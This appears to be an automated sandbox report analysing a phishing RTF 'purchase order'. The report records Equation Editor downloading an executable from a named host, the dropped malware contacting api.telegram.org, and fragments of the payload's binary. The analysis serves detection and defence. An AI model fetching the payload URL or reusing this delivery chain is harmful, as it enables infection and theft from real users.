                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4877C7E7-A321-4438-A27A-0B7C6E560902}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2560
                                                                                Entropy (8bit):2.8100989291245866
                                                                                Encrypted:false
                                                                                SSDEEP:24:IrpyUcwqII99iCDYNR6roVgJReOUyOoX6S66QLsQlNbOa4ZXk/cub505unG:IFyYjI/asJReKOof41b7iZuG
                                                                                MD5:2BDACAB3747178F7E0A6F4D7A31F6D11
                                                                                SHA1:C437C2836EAA2A00BBBA64EC08E0BB40FE4478C8
                                                                                SHA-256:3C1F78FABA6BDA5501E0019283F0D25EA06A379B24D2E8C1CA790B6749A08D89
                                                                                SHA-512:E388641848DDE78678FA3E5F089F66D0AFE7EAE6F19950BBF944D2F4A7144A4F2339990A95A13B6FC241575ECD43E8337FABA23A9255972E452CD27BDB043A3F
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: -.@.#.+.+.`.5.9.8...?.6...[.?...?.!.).7.[.=.(.+.(.*.../.*.9.1.%.6.[.%.9.!.|.8.:.=.`.;.%.^.$.*.?.#.;.'.*.6.[.1.3.)._.<.#.'...^.&...#.~.&.,._.2.(./.;.4.0.?.5...../.,.;.@.^.%.0.-.^.^.-.<.6.7.*.0.8.&./.5.<.;.[.~./.=.$.5.&.3.:.*.%.`.1...5.$.-.>.[.*.?.-.8.`.9.5.?./.'.%...7.(.<.5.1.@...#.^.?.3.!.[.!.'.'.9.%.%.%.~.?.].?.9.!.|.%.3.*.0.+.[...2.?.?.0.).+.|.-.&._.&.(.%...0.:.%.0...4.%.+.4.[.-...?.-.3.6.%.-.8.'.?...).?...-.=.).2.!.0...[.6...9.+.1...=.7.0.<.`.%...+.4.`.>.#.(...9.#.2.?.^.3.-.5.>.2.=.0.,._.`.@.#.#.?.<.5.,.).1.5.<.&...0.~./.%.[.%.0.,.,.$.+./.).8.+...8.9.3.?.^.'.1.:.1.3.=.)...!.(.?...`...+.,.?.2.<.4.-.>.`.(.?...5..._...>.~._...2.8.@.|.'.4.7.].3.%.].=.1.%.?.#.6.1...?.).(.;.~.9.#.>...@.%.0.).!.=.(.3.,.8.[.2.$.#.;.-.>.-.9.8.0.#.+./.'.?.(.....9.7.9.~...).-.@.=.[.@.4.0...?.[...3.?.1.2.4.@.?.~.&.(.7.9.#.;.3.1._._.].6.>.^.'.+.7.5.?.]...+.#.3.6.,.^.@.@.=.~.2.7.<.7.|.?.+.#.|.`...*.,.6.7.|.!.%.!.%./.,.?.$.,.9.?.:.]...9.<.=.4...+.#.9.1.).@.3.*.-...7.>.].#.*.2.-.?.>.!.?.(.[.@.:.~.].$.*.~.2...*.1.~.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1024
                                                                                Entropy (8bit):0.05390218305374581
                                                                                Encrypted:false
                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order_0131021.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Thu Oct 14 16:22:13 2021, length=15658, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):1074
                                                                                Entropy (8bit):4.525345332508347
                                                                                Encrypted:false
                                                                                SSDEEP:24:8CQ/XTTc+b+QROsdeoZROsiDv3qHwqE/7Eg:8n/XTA+y+OMLOmHTWB
                                                                                MD5:5553B96A2ED8B4558BACEB47D38C1748
                                                                                SHA1:70A0DA9820F6E3C5E755B8BD90B20705058049F0
                                                                                SHA-256:03E1FC72B2CDD61EBC996E5C2F95D4785502F121B329015D72F3B4597FDA7271
                                                                                SHA-512:2EE72D13C088478A3AE2CE0122586228C2A4BEB0C9CBE54008FF7334ECC25E50AB8D347D36EDF6ABAE9ACAA3D14748FAA1BF710A2AC17934D756E7A9693E0C81
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: L..................F.... .....>.....>...=... ...*=...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2.*=..NS. .PURCHA~1.DOC..b.......S...S..*.........................P.u.r.c.h.a.s.e. .O.r.d.e.r._.0.1.3.1.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\Purchase Order_0131021.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .O.r.d.e.r._.0.1.3.1.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569....
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):95
                                                                                Entropy (8bit):4.77019537852511
                                                                                Encrypted:false
                                                                                SSDEEP:3:bDuMJlt34qxpulmX1aWN4qxpulv:bCmoopuPNopu1
                                                                                MD5:AD3C75BA1EBB2EB0F34E5EDABE1344B8
                                                                                SHA1:EC8A7EADE69E7CB6FA86D3ACC021470E8186E57B
                                                                                SHA-256:84A877A95B14C0E7DDE0A99EB2BF9E56BC85130998E5F2DC3BBF6E4D47AF6F8F
                                                                                SHA-512:462AE39D68A4D7A498C2AE2E7AF1C8AEDFC83D0C4A858E86C6A58E44973D8152B89864B3F8049E6E65E3CC695EF29F5A73D46D280507550CA4AFDF8FA6CAB3D1
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: [folders]..Templates.LNK=0..Purchase Order_0131021.LNK=0..[doc]..Purchase Order_0131021.LNK=0..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.5038355507075254
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: ..
                                                                                C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):486912
                                                                                Entropy (8bit):6.778690362170083
                                                                                Encrypted:false
                                                                                SSDEEP:12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
                                                                                MD5:BC5F0AA0262021DB5921D726F7A5B820
                                                                                SHA1:B41245E3BBFC8A7905BFC56B88EA79975595F4F6
                                                                                SHA-256:B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
                                                                                SHA-512:A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                C:\Users\user\Desktop\~$rchase Order_0131021.doc
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.5038355507075254
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                Static File Info

                                                                                General

                                                                                File type:Rich Text Format data, unknown version
                                                                                Entropy (8bit):3.45414279609642
                                                                                TrID:
                                                                                • Rich Text Format (5005/1) 55.56%
                                                                                • Rich Text Format (4004/1) 44.44%
                                                                                File name:Purchase Order_0131021.doc
                                                                                File size:15658
                                                                                MD5:fc66be4a9696798aff0be8ed97bd294f
                                                                                SHA1:cf158b670ec831531a233d41872d1a9ee3850ff1
                                                                                SHA256:8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
                                                                                SHA512:3d68cde4050df2c0b519a237cd122176c7dcbeb8fb93bbdd6d3caa06ffa1fa37c2357822bf0d4f8d76c21050bd303e9d483dc76566c5b5f08ca72c226e56eb2d
                                                                                SSDEEP:384:U/RZbKkaCb3iWkAqF3UuUh/kIkBWsHDvu:UDbKkaOjkX3UuicZMF
                                                                                File Content Preview:{\rtf3212-@#++`598.?6.[?.?!)7[=(+(*./*91%6[%9!|8:=`;%^$*?#;'*6[13)_<#'.^&.#~&,_2(/;40?5../,;@^%0-^^-<67*08&/5<;[~/=$5&3:*%`1.5$->[*?-8`95?/'%.7(<51@.#^?3![!''9%%%~?]?9!|%3*0+[.2??0)+|-&_&(%.0:%0.4%+4[-.?-36%-8'?.)?.-=)2!0.[6.9+1.=70<`%.+4`>#(.9#2?^3-5>2=0

                                                                                File Icon

                                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                                Static RTF Info

                                                                                Objects

                                                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                00000033Bhno
                                                                                1000002F8hno

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                10/14/21-10:24:56.289135UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 14, 2021 10:22:59.049212933 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.071090937 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.071178913 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.071497917 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.093384981 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.100934982 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101012945 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101016045 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101056099 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101078987 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101115942 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101130962 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101166010 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101185083 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101238966 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101269007 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101285934 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101289034 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101325989 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101342916 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101380110 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101458073 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101511002 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101537943 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101578951 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.110775948 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123496056 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123564959 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123619080 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123620033 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123667955 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123675108 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123676062 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123725891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123728991 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123778105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123780966 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123828888 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123831034 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123872995 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123892069 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123939037 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123944998 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123989105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123995066 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124041080 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124047041 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124090910 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124097109 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124140978 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124145985 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124191046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124197960 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124241114 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124247074 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124288082 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124305964 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124349117 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124360085 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124383926 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124396086 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124411106 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124453068 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124461889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124505043 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124519110 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124561071 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.125000954 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146296978 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146351099 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146385908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146388054 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146419048 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146425962 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146425962 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146476984 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146478891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146513939 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146521091 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146552086 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146558046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146589994 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146605968 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146636963 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146642923 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146680117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146688938 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146717072 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146728992 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146754980 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146768093 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146794081 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146801949 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146830082 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146845102 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146867037 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146879911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146904945 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146919012 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146951914 CEST4916780192.168.2.22144.76.47.167

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 14, 2021 10:22:58.987952948 CEST5216753192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:22:59.023015022 CEST53521678.8.8.8192.168.2.22
                                                                                Oct 14, 2021 10:24:56.252165079 CEST5059153192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:24:56.270032883 CEST53505918.8.8.8192.168.2.22
                                                                                Oct 14, 2021 10:24:56.270914078 CEST5059153192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:24:56.289134979 CEST53505918.8.8.8192.168.2.22

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Oct 14, 2021 10:22:58.987952948 CEST192.168.2.228.8.8.80x8ff9Standard query (0)palangavra.ltA (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.252165079 CEST192.168.2.228.8.8.80x3162Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.270914078 CEST192.168.2.228.8.8.80x3162Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Oct 14, 2021 10:22:59.023015022 CEST8.8.8.8192.168.2.220x8ff9No error (0)palangavra.lt144.76.47.167A (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.270032883 CEST8.8.8.8192.168.2.220x3162No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.289134979 CEST8.8.8.8192.168.2.220x3162No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • api.telegram.org
                                                                                • palangavra.lt

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.2249169149.154.167.220443C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                TimestampkBytes transferredDirectionData


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.2249167144.76.47.16780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Oct 14, 2021 10:22:59.071497917 CEST0OUTGET /jukiestay/gufoxqa.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: palangavra.lt
                                                                                Connection: Keep-Alive
                                                                                Oct 14, 2021 10:22:59.100934982 CEST2INHTTP/1.1 200 OK
                                                                                Date: Thu, 14 Oct 2021 08:22:59 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Thu, 14 Oct 2021 01:10:12 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 486912
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Content-Type: application/x-msdownload
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 